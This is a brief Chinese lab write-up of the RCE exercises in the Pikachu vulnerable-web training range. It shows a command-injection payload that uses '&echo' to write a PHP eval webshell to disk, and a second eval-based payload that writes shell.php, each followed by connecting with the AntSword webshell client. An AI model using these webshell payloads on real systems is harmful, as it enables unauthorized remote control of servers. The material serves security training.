Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
恒拓高科WorkPlus4 分钟前
即时通讯软件厂家哪家好?企业应该根据需求选择
安全
雨田言炎25 分钟前
十、QThread多线程
linux·服务器·开发语言·前端·qt
向上的车轮41 分钟前
GitHub Actions 自动化运维实战:Java + TypeScript 全栈项目 CI/CD 至阿里云
运维·自动化·github
重庆小透明43 分钟前
深入探寻微服务【第三篇微服务的组件】
运维·微服务·架构
哎呦,帅小伙哦1 小时前
Linux 系统监控核心:/proc/stat 文件全解析
linux·服务器
cfm_29141 小时前
Logstash 8.x 入门实战
安全·es
恒拓高科WorkPlus1 小时前
企业内网通讯软件如何搭好“看不见”的通信底座?
安全
智脑API1 小时前
Codex config.toml check_for_update_on_startup 怎么关闭?离线环境与版本提醒排查
运维·服务器·前端
Ai思想家10 小时前
私有化部署的服务器选型与容量规划
人工智能·安全·ai
2401_8685347810 小时前
数仓开发落地手册
linux·运维